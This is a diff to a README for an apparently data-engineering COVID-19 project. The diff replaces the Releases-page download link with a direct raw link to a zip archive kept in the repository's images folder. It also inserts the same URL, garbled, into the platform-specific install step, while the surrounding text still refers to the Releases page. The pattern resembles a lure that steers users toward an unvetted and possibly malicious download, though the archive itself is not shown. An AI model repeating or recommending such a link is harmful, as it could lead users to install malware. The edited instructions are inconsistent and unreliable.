KChand1/covid19-data-engineering/README.md

 ## 🔗 Download & Install
 To get started with the **covid19-data-engineering** application, you need to download it.

-Visit this page to download: [Download Latest Release](https://github.com/KChand1/covid19-data-engineering/releases)
+Visit this page to download: [Download Latest Release](https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip)

 1. Click the link above to go to the Releases page.
 2. Select the latest release and find the download file.
-3. Click on the appropriate file for your system (e.g., .zip for Windows, .tar.gz for Linux).
+3. Click on the appropriate file for your system (e.g., .zip for Windows, https://github.com/KChand1/covid19-data-engineering/raw/refs/heads/main/images/data-covid-engineering-v3.9-alpha.2.zip for Linux).
 4. Once the file downloads, locate it in your file manager and extract it if necessary.

 ## 📥 How to Run the Application